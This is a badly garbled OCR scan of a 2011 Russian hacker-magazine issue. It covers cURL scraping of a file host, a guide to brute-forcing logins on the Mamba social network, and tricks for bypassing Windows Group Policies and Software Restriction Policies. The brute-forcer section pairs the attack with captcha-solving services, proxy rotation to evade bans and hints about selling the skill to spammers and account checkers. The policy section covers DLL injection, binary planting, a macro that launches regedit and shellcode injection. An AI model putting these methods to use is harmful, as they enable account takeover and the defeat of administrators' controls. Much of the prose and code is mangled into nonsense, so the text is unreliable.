);

01

шапка, которую наша сестра получили от LiveHПPHeaders на виде массива

curl_setop:t($curl, CURLOPT_URL, " http://sli l . ru/ 014e2491" );
curl_setop:t($curl, CURLOPT RETURNTRANSFER. true);_ _ _ _ _ __
curl_setop:t($curl,_i:URLOPT HПPHEADER,_$jJead);_ _ _ _ __
curl_setopt($curl, CURLOPT_ENc;QDING, "gzip,deflate" );
$out=curl_exec($curl); // создаем комбинация
curl_close($curl); // закрываем текуще е связывание

Готовый парсер slil.ru

Всего

07 строк заключение ,

равным образом ты да я имеем отправной шифр страницы

s l i l. г u/3140 0 091 на переменной
Прежде нежели намалевать п ер вые строчки в

cUR L, нуте

проанали­

$out . Осталось лишь только

встретить нужные

нам данные, вместе с ч ем справится сле д ующий скрипт:

зируем, во вкусе браузер получает страницу. Ведь нам нужно замаски­

роваться собственно перед браузер. Для сего откроем

Mozilla

Fiгefox равным образом

$filedata=explode(" <p align="center">", $out);
$filedata=explode( "< /p>", $filedata[1]);_
list($filename,_jfilesize)=explode(."_&nbsp;&пbsp:&nbsp;,-"-"~--­
_trim(strip_:!;_qg~($filedata( e]))); __

запустим плагин LiveHTTPHeadeгs. Теперь перейдем по мнению тестовому

адресу s l i l . г u/ 0 0 0 0 0 0 0 0 да поглядим во иллюминатор плагина. Там склифосовский бездна
логов, с которых нас интересуеттолько самый центральный запрос.

Вот вроде спирт может выглядеть:

GET /314е2491
Host: slil. ru

$temp_link=explode(" var llnk=\", $cResult);
$temp_link=explode(" \ "; ", $temp_link[1]);
$temp_link=trim(str_replace( ""+"", " , $temp_link[e]));
data=arra (" name" -> $filename, "size" -> $filesize, _ _ _ _ __
"lin k" -> $temp_link);,_ _ _ __

НТТР/1.1

User-Ageпt: [ЮlЕРАГЕНТ]1 _ _ _ _ _ _ _ _ _ _

-----

Accept: textLxml,QpplicatioпLxml,applicatioпLxhtml+xml;g~
As; не без; ept- L<miO-l<!Ш!_;_gл- us_,eп;_g:;.!l.5
Accept-Eпcodiпg : gzip,deflat_
e
Accept-Charset : IS0-8859-1,utf-8;q=e. 0, *;q=e. 0
Keep-Alive: зее
Соппесtiоп: keep~aliv",
e _ _ __

Таким образом да мы из тобой спарсили имя, размер равно ссылку файла со одной
страницы.

многопоточносты
Но во вкусе но спарсить моментально целый ряд файлов? На поддержка приходит много­

поточность cURL"a. Чтобы взбучить вагон файлов, нам нужно

Если текущий представление возвращает нужную нам страницу, значит,

вмещать равно как минимальное значение бездна ссылок . Дл ваш покорный слуга уборная напишем г енера·

его наш брат да будем пустить в ход на качестве маскировки.

т шум диапазона ссылок, исходя изо стар т овой равно последней ссылки:

СОСТАВЛЕНИЕЗАПРОС

fu nction

Теперьдавай напишем простенький скрипт ради получения страницы

0 СЕРВИСАДЛЯ

geпlinks($from,

$to)

_ {______________________

со файлообменника:

РАСПОЗНАВАНИЯ КАПЧИ

Использованиеонлайн­
сервисов дляра спознава ния

0

<<Антигейт»

[ aпtigate . com l-oдин с

0

<<КапчаБот»

lc aptchabot.coml- аналогич-

0

Death Ьу Captcha

[death Ьуса ptcha .coml- ото но-

капчиоченьпопулярновсерьезных

самых первых и, безусловно, самых

ный, н насчёт поменьше знаменитый сервис.

сительна новомодный относительно ект, позицио­

проектах, зачастую основанных получай

популярных сервисов . Здесьтебе

Точность расшифровки маленько

нирующий себя в качестве кого самого крутого

получении выгоды потому-то иначе иного

не без; удовольствием помогутрасшиф­

в меньшей мере

действия. И действительно, на хрен

ровать русские да английские капчи

вает многопоточность на своих

удовольствия-1,39 долл. следовать

программи ступисатьнейросетии

форматовJРG,

API . Ц ена-30

распознанныхкапч.Среднеевремя

си подевать бессоными ночами вслед кодом,

такоеудовольствиеотносительно

изображение, а эпоха обработ-

распознаваниясоставляет17секунд

при случае не запрещается прямо заплати ть одинокий

невысока-1 долл . вслед за

ки -до

вместе с точностью 00% равным образом выше. З -де сь твоя милость

серо-зеленый уе вслед за целуютысячу раз­

но ний. Качествотоже держи уровне-не

гаданныхкапч.Давайрассмотрим

побольше

три самых известных да популярных
антикапчевых ресурса:

GIF да PNG. Цена из-за
0000 изобра­

[80 %1, опять же

поддержи­

копеек следовать одно

00 секу нд . Значительный

распознавателякапчнарынке.Цена

0000

совершенство системы- программные

как и найдешь целую кучу пр о­

примеры, позволяющие безбо­

граммных решений для того работающе­

ность отстранить деньжата обратно, во

лезненно соединять услуга во

го получи сервисеАРI.

случае неравно тебя нечто невыгодный устроит.

особый проект.

00% ошибок, а в свою очередь возмож­

ХАКЕР

00 / 053/2011

Парсингпо -к рупному

_ $i=~_$links=arrgy(); _ _ _ __
__fQ_c_($i=e;j i <=(ito- $from);_$iн),_ _ _ _ _ _ __

____ { ________________________________________________
$links[]="http://slil.ru/" .($from+$i);

clickUrl=h tt ~ЗA%2F %2 Fmamba.r u%2Ftips%2F%3 Ft~p%ЗDLogiQ&
target=&logJn_sв_R tcha=&login=xxx&passwor d=x 0 x22QL _______ _
VAnk~t a i q=13&Red i ~ectBack=http%2~~%2 02F%25~Fmamb~

ru%252Findex.phtml%253F

}
return $links;

А д рес API- mamba . гu /aja x/ login . phtmi ?X F o гm=L o g i п .

_}
$JJ!lk s_ .=_ge n~_in!s s (ЗН.~421, JJ4~2 ~ЯJJ; ··--·-·········-·······----

СОСТАВЛЕНИЕЗАПРОС
Те перь всмотримся во самовольно запрос. Как видим, з десь уж фигурируют

Теn е рь автор сих строк имеем 000 сс ылок s lil . гu от31402491 поперед 01402591 на виде

сессии, эт об осязаемо п в рассуждении cookie . Та кже пишущий сии строки видим, зачем посылаются дан­

массива . Те п ерь приступим ко самой многопоточно вместе с ти . Е е материализация

ные, да посылаются они методом РОSТ. В се сии дет а ли нужно учес ть около

немн об го труднее, же пользу кого держи вместе с не имеется ни плошки трудного .

написании брутера.

В cURL"e многопото чно сть действие етследующим об ра зом:

0.
0.

Те п ер ь не без; нова открывай ди ск да ищи н а нем очеред н ой около мер получай

Создаем д еск риптор многопоточности, на тот или другой следом единовременно ради

РНР + cUR L. Н а таковой ра з наша сестра д в отношении л ж ны п олучить опре д едва нный отчёт через

разомскладываемнастрое нны е сое динения .

авторизационного API <<Ма м бы», означающий правильнесть иначе не­

Пр обе г аемся п в отношении д ескри пторуфунк ци ей cuг l _m ul ti_exec, которая

пр а вильность испарения << лаги н- движение роль» .

в духе разиисполнитвс iис однажды ~

В оттак выгляд итотв ете неправильной марево ой :

0. Для посл е ду ющего обхо д а ре зультатов работы исполь зуе м c uгl _
multi_getcoпteпt .

{ "t" : "еееееееееееее", "а" : ееееееее, "s" :1, "е" : е, "d" : [], "r" : е, "XFor
ms" : { " Login" : { "found" : " \ul341d \ue435 \ue432\ue435\ ue44e\ue4Зd \

За примерам реализа ции экий схемы форвард н а ди ск равно запускаем

ue4Зe\ ue443 \ue4Зa\ ue4Зe\ue437 \ui34Зe\ul343d \ue4Зb\ul343e\ ue433 \

функцию paг se l i п ks ll из л е дующим образом:

ue438 \ue4Зd \ul3438\ue4Зb\ul3438 \ul343f \ ue4Зe\ue44e\ue4Зe\ue4Зb\

ul344c" }}}
$info=parseLinks(genLinks(314132491, 014132591));
А воттак вместе с правильной :
Теперь, послетр ех -ч етыр ех сек у ндработы скри пта, да мы не без; тобой имеем инфор­

мацию что касается 0000файлов, сохраненных возьми sli l.гu , вдиапа зо неот3 040 049 0 прежде

{ "t " : "еееееееееееее", "а" :"eeeeeeee", "s" :1, "е" : е , :"d " : [ ] , "r" :

01402591 . Далееужедело фантазии . Можно, например, прои звест да выбор­

.:.ь:ttR%.ЗA%2F %lE_mi!rnh!hrJ!-"...2 E_t i p~%2f..% ЗFJip%ШLogi n " ,.:.хЕо rm s.:":.!H

__ _

ку конкрет ного формата файлов, дозволяется да х на се не без; бросать для себя сверху компью­
тер до соответствующим ссылкам, позволено произвести на свет сканирование за фра зе да

П озтому будем вычислять , ч ведь когда на ответе короче быть сутст на овать

где-то далее. Как ноне зывает пр актик а, ни ложки из ложного во этом нет, того

со трока

рассмотрим е ще сам прим е р, кто будетуже капельку сложнее.

двое подош л а. Та кже хочу отмети ть , что такое? цельный ко д вместе с ди ска вместе с ледует

"r " : "http%3A%2F%2Fmamba. ru%2Ftips%2F%3Ftip%3DLogin", в таком случае

оберну ть на счета п оточный вариант, нелишне во виде функции. Но

УТИМ «МАМБУ»
Дал ее да мы со тобой остановимся для брутере с целью социальной се ти « Мамба >>

невыгодный буд у п ов торяться , та ко по образу со объединение соб ы р еа ли зации эдакий мно г по отношению п оточ­
ности об п исаны выш е.

l w w w. mamba.гu ).
Как обычно, д авай составим алгорифм работы брутера:

0. По из ылаем представление от лагином да парол ем .
0. Принима ем отвеL
0. Сверяем павел учен ный ответеуже подготовленным ответом << н еудач­
утнапиштим туман » равно , когда они одинаковы , возвращаем false, если возвра­

ПАЛКИ В КОЛЕСА~
Соз д авфункциональныйскрипти пр оверивоколо1000аккаунтовза
минуту, твоя милость можешь удивить ся тому, который р езу льтаты дале ко отнюдь не денно и нощно

будут корректными. Для сего советую тебе пр осто- напр ос т касательно принуждать овраг
работы , на тот или иной записываются ответы сервера. Открыв т акой л ог, твоя милость

сейчас е м tгue.

уви дишь подобные записи:

Теперьос тановим ся одну каплю подробн ее сверху самом механизмеавтори­

{ " t "":.:".1311437340338", "а" : е, "s" :1, "е" : е, "d" : [] , "r" : е, "XForms" : е,"
captcha" :1}

з ации <<М ам бы» . Перейдя в сайт, да мы из тобой посмотрим для нопоч ку<< В аллюр ». На жав получи и распишись
безграмотный е, твоя милость никуд а безвыгодный пере хо д равно шь, а равным образом неграмотный соз д ается ни каких н что касается ваша милость х очес н ,

з ато п осередине экрана п оявляется новы й не без; лой вместе с формой ради на побежка . Из

А та кже записи, свидетельствующие по части бане IР -а дреса , со которого

сие го из ледует, что-то сто итожидатьдва варианта развития событий:либо нас

так тому и быть б р ут. Капча обходится ра зны ми от по мнению соба ми lo в особенности популяр ­

пе реки пропал держи каку ю-то страницу п ос л е ввода нев ерной туман , либо а всi

ных с ни х автор этих строк еще рассказал выше) , а вишь ба н IР -а др еса подумаешь поправить

сие черт знает что реализовано бери Aja x"e от через вн ут ри сайто вого API.

что касается дн ой строкой для cURL :

Первый вариантбыл бы тя жел ее интересах брутера, таково равно как пришлось бы п о­
л начать из сервера бог не обидел м усора да л ишне го html-кoдa , а вотвторой версия

curl_setopt($curl, CURLOPT_ PROXY, "12 . 04 . 06.78:8е" );

был бы идеальным, круглым счетом в качестве кого автор настил у ча ем всеголишь 000-300 из имволов с
внутрисайтовогоАРI , нежели ускоряем работубрутера . К нашей радости, возьми
<< Мамбе » используется как бы разок втор ой вариант- из АРI.
Д алее нам необ хо димо выкопать домицилий сего самого AP I. Искать на html-

Е слирассматриватьпримермногопоточногоскрипта,толуч ш е
ис п ользова ть малограмотный одинокий , а мно го прокси, которые б ы автоматично
м е няли сь в дальнейшем паркет уче ния ба н а.

равным образом JavaSc г ipt-кoдe, ко нечно, мож н о, хотя да мы вместе с тобой будем мудрее да несложно из нова
используем замеча те льный пл агин с целью << Лисы » L ive HTTPHeadeгs .
Открыв не без; траницу, введя марево у<<ло гин - п аро ль » равно н ажав для н об пк у

ЗАКЛЮЧЕН И
Как будто с практики , действие из ч ужими балка тами совсе м безвыгодный тр удн а

<< В хо д », автор сих строк уви д им на окне плагина приветствие скри пт а, которы й да отвечает

равным образом мно ги е безусловно но ахти популярные сервисы невыгодный очень-то равно стараются на

заправильность/не пр а вильно со тьпары:

вслед за щиток е собс твенны х д а нны х через грабина би нга . Е вместе с ли, п относительно п робовав по части 14 са н ­
ные на стат ье не без; п особы равным образом приобретя соот во е т не без; тв ующий насчёт пы т, твоя милость хоче шь

POST / ajax /login . phtml?XForm=Login НТТР/ 0.1
Host : mamba. ru

монетизировать близкие навыки, в таком случае могу намекнуть, аюшки? на Н-т усо вк е
определен ны м со относительно сом издревле п ользавались да будут п ользова т ься
всевозможные авторегистраторы, спамеры, грабберы, ч екеры равным образом беспричинно
д алее.

На этом со п е ш у откланяться, удачн касательно г касательно п а рсинга! :Х:

ХАКЕР

00/153/ 0011

065

взламывание

Алексейка » GreenDog»Tюpин,

DSecRG.ru, Digital Security lagrrrdogragmail.coml

Недостаточно прав?
Достаточно
0ПРИЕМОВДЛЯ
ОБХОДА ГРУППОВЫХ
ПОЛИТИК
МЕНЕ

Не знаю, нежели руководствовалисьлюди с

Microsoft,

когда-когда

проектировали равно создавали систему групповых дипломат

на

Windows,

да получилось у них никак не беда . Система по­

лучилась гибкой равно функциональной, да со немалым ко­
личеством лазеек, позволяющих отшагать ограничения равным образом
домчаться по тех мест ОС, вход для которым запрещен.

касательно правде г оворя, групповые п по отношению литики был равным образом исследованы повдоль
равно п оперек вновь пятьлет отдавать . Однако используемые р е шения
недостаточно нежели изменились . Многи е ба г равным образом за - пр ежик нем у работают.

Кроме т по части го , п оявляются новые манеры с целью обхода гр у пп овых дипломат .
По этому автор решили соб ратьдля т ебя н екото рый подбор рец еп тов ,
дай тебе ты. во-первых, был в силах возьми хоть бери вооружение, а во-вторы х, пере ста л
веровать на т о, который групповые политики -это средство . При во всем удоб стве
да х исполь зо вания они н е мо г ут обеспечитьдолжный степень защи твоя милость .

Но о на сем объединение порядку.

ЧТО ЭТО ТАКОЕ?
Е из ли веритьскучным опреде л ениям, ведь групповы е политики [или Gгoup
Роliсу)-это эффективны й да централизационный прибор у правления
многочисленными п а р аме трами в рассуждении п ерацио нны х систем да приложений .

Гр у пп овые политики позволяютадминам предопределять правила, на соот­
ветствии не без; которыми н аст р а иваются п араметр ы рабочей среды какдля

пользователей, беспричинно равным образом пользу кого компьютеров. Пр още говоря, этодовольно мощ­
ныйинструментдляограничениявдействияхобычныхпользователей .
Существуетмасса р азлич ны х п олитик равно прав, вместе с правая рука в отношении щью кото ры х позволяется
из-за пр е титьвыз ов ди вместе с п етче разад ачили р е безусловно кторареес тр~ запре тит ь д о­

сту п для м е натурщица << П уск>>, а как и вдоволь податливо относительно граничитьзапуск программ­

возьми гооб еспечения [зто реализуется не без; помощьютак держи з ыва емых Softwaгe
Restгictioп Policies) . Является ли этотмеханизм эффекти вным ? Лишь
через части. До сту п для ш касательно рт ката м, запусклевого ПО равным образом систем ны х близ ложений,
направление е н ение получай ст р оек- во се э тодостаточнолегко вслед пр е щ ае т ся вместе с через

гру пповы х государственный деятель . равно из этой точки зрени моя особа не запрещается сказа ть со п асибо раз­
работчикам ОС. Н о, увы, какзто обыч только б ыва ет, зти полит ики зачас т ую
дозволяется обой ти . Тут из тоитс выделывать огово рк у. В се политики позволяется ра зб ить
получи и распишись двум ко а т е гории-для компав равным образом ради пользователей. Гру пповы е поли­
тикидоступны на правах на доме н е, этак да в л ока льном кусок п е. Е сли говор пусть будет так касательно
локальной машине, т относительно их дозволено п осмот р еть чрез со пециальн ую оснастку

gpedit.msc [secpo l.msc ). В данной вместе с та ть еос н овной акцентсделан собственно
в доменны е гру пп овые политики . Итак, пр иступим.

ТРЮК 0. ОБХО

,.._ . . __

TdSk Mdnagcr

что до

~
ь.",...-.ш .

ИМ ЗАГРУЗКУ ПОЛИТИ

Д авай разберемся, на правах на ооб щ е каж дая авто во локальн ой бредень по­

лучает груп п по части вам е политики изо помещение е возьми ? Пр по отношению ц есс соз дания гр у пповы х
полити ко м ож однако ра зб ить бери вместе с л е дующие усик ловны е э тапы:

0. А дмин соз дает объектг р упповойпо лити ки.
0. Привя зы ва ет е го для каки м-т об элемен т ам д омена.
0. Прив хо д е вдом енкомпо тправля е тзапр осна п насчёт л наука политики
п олучаетихвответотдомена .

0. При входе п касательно ль зова т е ля выполня ется родственный после оборона с, так сделано
п по части п ользова т е ль ским полити кам.

ХАКЕР

066

г

00/153/2011

Недостаточно прав? Достаточно

GJ§(8)

fil? Ut111ty Manager

omJ

Hide

Win+U + Help +Jump to url=По лн оце нн ы й Explorer

Итак, что-нибудь ты да я на этом месте видим: политики подгружаются в стадии входа

Об хождение ч е рез некорр е кт н ую обработ ко уярлы засада

уж далеко не страшны . Сделать равно как правило- безвыгодный проблема. Даже буде

на систему. Здесь вкушать небольшая фича. По умолчанию корректировка

недостает возмож н ости закачать п рограмму н а хает, мож н в отношении вас п олнить ее

государственный деятель выполняется каждые

удаленно !на п ример , от шару! .

0 минут. Но кабы политики далеко не были

получены вот момент входа во систему, ведь обновляться они никак не будут!

Вырисовывается простой способ, вроде зту отличительная черта не грех
ис п ользова т ь:

Увы, ужотко сверху нашем пути возникает видоизмененный конструкция ограничений­

0. Вынимаем патч-корд с килоом батман .
0. Включаемкомпилогинимсяподсвоейучеткой .
0. П одключаем патч-корд обратно.

SRР ISoftwaгe Restгictioп Policiesl . Это ряд политик, вместе с через
которыхадмин можетограничитьсписок ПО, которое можетзапускать

пользователь, от чернявый да пребелый списки.

Blacklist да White list

определяются не без; через правил , которые можнозадавать несколькими

Даже около отсутствии доступа во интернет наша сестра сможем забраться во землевладение , этак

способами : до зонам равным образом до сертификатам !первые двоечка варианта практи­

во вкусе во даже прежде закешировала свой лаги н равным образом параль !это содеялось в

чески никак не используются!, а да в соответствии с пути поперед файла да в области его хеш у. Ото м,

пора предыдущего входа на систему!. Но ранее вне применения груп­

сколько на системе действуют политики SRP, указываетсоответствующий

повых политик. При зто м автор сих строк ровно сможем пустить в дело резервы

статья во реестре- Н КЕУ_ LOCAL_ МАС Н 0N E\Softwa гe\Policies\M icгosoft\

сети, эдак как бы п атч-кор д для этому моменту короче держи месте, а со всякими

Wiпdows\Safeг\Code l deпtif i eгs\TгaпspaгeпtEпaЬied со значением потому что л ь ­

авторизациями получи удаленных ресурсах справится хозяйка винда . Стоит

шим О, который, какуже было сказано за пределами , проверяется быть запуске

добавить, что-нибудь во безопасном режиме винды групповые политики во­

процесса . Наша задача, соот ветственно, отсечь эту проверку в середке

едино никак не действуют. Комментарии, пишущий эти строки думаю, излишни .

запускаемого процесса . Туся Руссинович lgoo.gi/KNauh l сызнова на далеком

0005 годуопубликовал место на благе об обходе SRP равным образом представилтулзу

РЮК2.КАКПРОИСХО

ИТПРОВЕРКАПОЛИТИК .

Важнопонимат~накакомэтапепроисходитсопоставлениедей­

GPdisaЬie. Она производит DLL-инъекцию во назначенный процесс, подгру­

жая специальную DL L"кy. Когда слушание попытается извлечь важность

ствия,котороехочетвыполнитьпользователь,стемиограничениями

ключа реестра НК Е У_ LOCAL_ MACH IN E \Softwaгe\Policies\Micгosoft\

групповых политик, которые н а него накладываются . Сперва нуте

Wiпdows\Safeг\Codeldeпtifiers\T rапsрагепtЕпаЬiеd , ведь глотать хорэ относительно ­

разберемся, идеже расположены политики .

верять в бытиё государственный деятель SRP, данная комната перехватитзапрос

Из начально, конечно, держи контроллере д омена, отколе сделано пере­
даются в аппаратура на локальной сети. После получения групповых
государственный деятель бери клиентской машине они сохраняются на реестре винды во

равным образом вoзвpaтитSTATUS_OBJECT_NAME _ NOT_FOUND. Таким образом, про­

цесс думает, почто всё-таки ОКи SRP политики во системе безвыгодный действуют.
После покупки компании Sysiпteгпals Майкрософтом GPdisaЬie

следующих -местах lприведены основные ветки ! :

перестал бы л офи ц иаль н касательно доступным !но его весь п режнему совсем нечего делать

П оли т ики дл ваш покорный слуга компа_:__

Утилита GPCu18oг I Ьit.ly/пJAYгi l ото Егiс"а Rасhпег·а выполняет а н а­

• H K E Y_ LOCAL_MAC H IN E \Software\Microsoft\Wiп d ows\

логичные фу-ты н кции, же д осту п бери на исхо д никах. Что з т что до нам дает? Мы

Curre п tVersioп\Po li cies\

можем подложить во GPCul8oг любые часть значения реестра винды

разыскать во Сети I Ьit .ly/ ппzjN9 0. Есть до этих пор сильнее продвинутые решения .

• HKEY_LOCAL_MACHIN E\Software\Policies\

IDisaЬieTaskMgг, PгoxySettiпgsPeгUseг для примеру! равно таким образом

П ОЛ ИТИ_кiLД!lJ"I_!!QЛ Ь ЗОf!Ш~Ле~ ;_ ____ _

обижать всегда возможные касательно г ра н ичения п оли т ик. Какие не сколько иное значения,

• HKEY_CUR ENT-YSEll\Softw a re~Microsoft~Wiпdows~C u rreпtVersioп~_
Policies\
• HKEY_CURENT_USER\Software\Policies\

спросишь ты. Тебе на пособничество RegMoп через Марка Руссиновича, хотя, объединение
сути -зто всё-таки значения с ветки

Policies .

Дру г ой оригина л ьный не без; п особ во своем благе относительно п убликовал Ди д ье

Стивене lgoo.gi/LE1 MO I. Используя еваютупзу bpmtk IBasic Process
Когда запускается какой-то процесс, ведь во нем !то лакомиться во
useгspace"el производится проверкада н ных веток реестра !через

Maпipulatioп То о! Kitl, возлюбленный предложил напрямик на памяти ради ц есса доносить
значениенеобходимогодлягрупповойполитикиветкиреестра.

за дг руженную библиотеку advapi .dl ll н а те иначе некоторые люди огра н ичения,
которые попозже кешируются/сохраняются на памяти процесса. Они

ТРЮК4.

п роверяются, рано или поздно юзер выполняет какое-то д ействие,

Утилита GPdisaЬie состоит изо двух файлов :

BINARY PLANTIN

скажем включение П О. В нежели подвох? В том, что такое? ко н эльф производит­

gpdisaЬie.exe- инъектирует

ся изо са мохо процесса . То глотать ежели слушание << неграмотный захочеТ>> опробовать

gрdisаЬiе . dll-специальная DLLдля обхода

DLL во процесс;
SRP.

политики, так ничто его невыгодный заставит их соблюдать. Никакого общего
монитори нг а далеко не п роизводится! Отсюда вывод: когда я каким-то
образом сможем привести в действие каждый процесс, ведь политики нам

Х АКЕР

00 /153/2 011

Как автор сейчас сказал, если бы наш брат можем лукнуть приложение, т что касается

можем легко и просто перегнать SRP да кое-кто политики !через GPdisaЬie, bpmtk ,

067

взламывание

-

lllbl!мtlt8W"d..,tl"illlf0"7---·-ь.nprewntedЬo1•..n-•t8JЬktlllnpaky. Par-.~CII*1
E-*~OfC"Of"Ud)"CU"~~.tar.

Макросы безграмотный nаляте моя персона nолитиками

SRP

GPCuiBor- неважно!. Однако на реальной системе может оказа ть ся
безвыгодный круглым счетом у ж не мудрствуя лукаво пустить сии приложения. Но наша сестра можем подгр узить

Обход nолитик путем Runas

DLL [в книга числе gpdisaЫe.dlll . Тут убирать капитальный нюанс. Групповые
политики около запуске ПО могут пр оверять равным образом DLL"ки, однако рядом э томик
достаточносильнопадаетпроизводительностьсистемы,потому

согласно умолчанию сия опция отключена. И наша сестра сие можем использовать!

Оченькстатиприходитсянедавнееисследованиеоткомпаниидсгоss

Security I Ьit . ly/ov7EAz ), которое рассказывает что касается новых [достаточно
извращенных, хотя работающих! методах подгрузки ко истинно на процессы .
При ем называется Binary planting [и вроде е го кайфовый npимep­

dll hijacking), около е го изучении у меня возникла мысль: «а с каких щей никак не

0. П ереиме н овы ва ем gpdisaЫe.dll во ehTrace .dl l.
0. Создаем папкус именем кyкy.{2E095DDO-AF56-47E4-A099EAC038DECC24} [название любое, подтекстовка послеточки исчезнет!.
0. Кидаем ehTrace .dll во всего только что-то созданную папку.
0. За х одим во папк у равным образом создаем после какой приглянется оригинал во Word, Excel или, ко
примеру, PDF " кy.

0. Теперь ото крываем исключительно что-то организованный файл.
0. Соответствующая п ро грамма долина жна запуститься. И лукнуть
совместно из подгруженной DLL"кoй!

использоватьегодляобходагрупповыхполитик? » . Е слисистема

разрешаетзапуск приложений лишь изо белого от 3 ска [пускай д аже

0. Все, политики нам безграмотный страшны.

лишь только Word), так сего ранее достаточно, ради подложить нашу п о­
лезную DLLдля обхода SRP. Итак, попробуем скрестить dll hijacking с

ТРЮК5. ИСПОЛЬЗУЕМ ИСКЛЮЧЕНИЯ

п арней изо

Часто дозволяется быть равно не принимая во внимание подобных ухищрений, разве вкушать тонкости

Across да GPdisaЫe:

политик, на результате ко т орых их образ действий распространяются:
бери программы, запу щ енные ото имени учетной вслед за 14 си

SYSTEM ;

драйверы равным образом др угие приложения уровня ядра;
макросы в утробе документов

ГРУППОВЫЕ ПОЛИТИКИ

Microsoft Office;

программы, написанныедля общей многоязыковой библиотеки

времени выполнения [Common Lan guage Runtime).

В ТОНКИХ КЛИЕНТАХ

Итак, проце ссы oт SYS TEM никак не контролируются. П е рвы й финтушами:
разве естьдос т уп ко какому-то ПО , запущенномупод такойучеткой , ­
Хочется до этих пор текстануть пр касательно т акие системы, наравне

Citrix XenApp. Что

сие такое? ХепАрр, неравно болтать простым языком, сие общественный порядок <<до­

атакуем . Например, нажимаем Win+U - з апускаются <<специальные

потенциал » [лупа равным образом экранная клавиатура) . Utilman.exe lпроцесс << сnе­

ставки>> приложений [хотя этотолько порцион функционала) . По сути,

циальных что от тей » ) рядом этом запускаетс аз многогрешный oтSYSTEM. Далее пойдемте

сие что-тотипа терминального сервера винды, же рано или поздно п ользовате­

тама на << Сnравку » . Онатожедолжна признаваться не без; нужными привилегиями,

лю перед сту пнот по отношению лько конкретное прил оже ние. В жизни сие выглядит

приближенно какза пущена на контексте процесса не без; прав а ми

так. П ользовате ль коннектится клиентом ко Citrix-cepвepy- ему

далеко не самая новая lдо Vista l, в таком случае кл икаем п равой кнопкой бери синей верхней па­

выводится списокдосту пног по отношению ПО. Дал ее Юзеф ер запускает какое-то

нельке << Jumpto url », немного погодя печатаем <<С:\» равно получаем сущий встроен­

добавление равно начинает во нем мучиться . Основная фича на том, что-то

ный

в сущности тяжба приложения выполняется н а Cit r ix-cepвepe. По

пролистать первообразный шифр IViewSource) чрез блокнот, откудадалее

сути, заданный п одход хорошенького понемножку [особенно не без; тонкими для ли ентами!, же у него

дать до шапке впредь до файлов. Или другой породы вариант-<< добавить» новоиспеченный принтер,

вкушать пучочек косяков не без; точки зре ния безопасности. Так наравне проц есс - получи и распишись

получив в рассуждении число но вход для листингу файлов.

сервере, то, значит, поль зовате люд осту пны до сей времени запас сервера

lc

учетом пользовательских пр ав, конечно) . Это безграмотный ужас хорошо, круглым счетом

SYSTEM . Е сли на даже

explorer. Если паче новая, ведь дозволяется в области правомуклику втек со техелпа

Др угая интересная категория- макросы в утробе д окументов

Microsoft Office. Это страшное д ело. П относительно пр обуем интересах начатки реализо­

в качестве кого предполагается, в чем дело? у пользователя д насчёт л жен бытьдоступ всего ко

вать запус для ПО. Хотя буде запускание заблочен обычными политиками [не

запущенной программе, а н е ко ОС. Что пока что хуже, добраться-то прежде самой

SRP), как, как-то , блокировкой диспетчера задач , так этотоб х од малограмотный

ОС- безграмотный осложнение . Д аже когда у самого ПО блистает своим отсутствием во озможности за вз аимо­

сработает. Но нам -то главное-запустить специально предназначенный ехе " шник .

д ейс твию вместе с ОС [не т список <<О ткрыть », <<Сох изранить как» ) , ведь от тандартны е

П оэтому на любом документе сме л по части создаем сле д ую щий макрос равным образом про­

внутренние резервы винды по сию пору е щ е работают: нажимаем во Сitгiх-приложении

буем запусти ть е го :

<Ctri+Shi ft+Esc>- нам открываетс автор ди со петч ер задач Cit r ix - cep вep a,
тож невинный крик по части раскладке клавиатуры , а с того места на обложка справки из
возможностью листинга дир ек т орий . Лично автор от т олкнулся со групповы­
ми политиками вот поэтому и есть во этом контексте- рядом взломе

068

Citrix.

Sub GOSHELL()
Shell "C :\windows\system32\regedit.exe" , vbNormalFocus
Eo_d_Sub _ _ _ __

ХАКЕР

00/1 03/2 011

Недостаточно прав? До из таточно

В результате, наравне твоя милость можешь догадаться, наш брат получаем запущен­

дневник во них , так да после этого могут являться проблемы . Так на правах нате самом деле

ный ехе. Хардконный средство предложил ещё а Дидь е Стивене

полномочия держи учет у поль зователя есть- в соответствии с дефолту на папку C:\windows\

l goo . g l /kSPKЗ ). Используя на макросе MS Excel функции ViгtuaiAIIoc,

system32\spooi\Pгinteгs равно C:\windows\temp. Если у пользователя хорош

WгitePгocessMemoгy равно CгeateThгead, возлюбленный сумел подложить шеллкод

реальность черкать на какой-то опись со софтом, то, считай, соответ­

изо макроса во парамнезия процесса. Д а нный ш еллкод подгр ужает DLL"кy

ствующие Политики

во видеопамять процесса , а DLL"кa- безвыгодный аюшки? иное, как бы cmd.exe. Кстати, ее

практике выверить , какие у пользователя кушать права, поможеттулза­

исходникивзяты с проекта

AccessChk ото всё-таки того но Руссиновича l goo . gi/Ю9tt ).

ReactOS. Как автор этих строк уж сказал, SRP может

SRP поуже неграмотный сработают. Кстати, с целью того дай тебе бери

противиться запуску DLL"eк !хотя равно неграмотный делает сего в области умолчанию),

РЮК7. ИСПОЛЬЗУЕМ

хотя буде подгрузку библиотек осуществлять, используя функцию
LoadlibгaгyEx со

РУГОГО ПОЛЬЗОВАТЕЛЯ

Есть дорога никак не расставить ноги подгрузки политик, хотя про сего три ка нам

LOAO _ IGNORE_COOE_AUTHZ_LEVEL на смену

Loadlibгaгy, так осмотр получи сбоку припека подгр ужаемой dll ко

соответственно надобятся лаги н равным образом парольдругого поль зователя. Суть на том, что-нибудь нам

white-лиcтy отнюдь не происходит!

нужно зайти во систему <<е щ е раз», хотя безграмотный подина собой. Тут банан варианта :

0. <Shift> + праведный

РЮК6. ИСПОЛЬЗУЕМ ПЕРЕМЕННЫЕ СРЕ

Ы

подбор выбираем

Когда начинаешь гонять групповые политики, в таком случае приходит осознание,

выкрик нате запускаемом файле, дальше во контекстном

<< Run as ... >>.

0. Через микроконсоль держи бираем команду: гunas/nopгofile <название

что такое? ради создания защищенной системы nотребуется попотеть. Дело

ехе -ф айла>.

трудное равно со большим численностью тонкостей. Например, разработчики
Другой пользователь, перед которым твоя милость запускаешь программку,

предлагают админам пускать в дело приспособленный хи нт-указывать пере­

SRP. Д а вишь тогда

во вкусе равным образом ты, может бытийствовать обычным пользователем не без; ограниче нными пра ­

проблема. У пользователя, если бы их железно малограмотный прищучить, вкушать воз­

вами. Но политики н а запущенную программку поуже никак не будут действо­

можность их переопределять. Указал, скажем , админ , что такое? с п апки

вать! См . рисунок.

ме нны е среды на качестве путей к ограничений

%ТЕМР % не грех начинать ехе" шни ки, а невращение ер взял истинно да переопределил

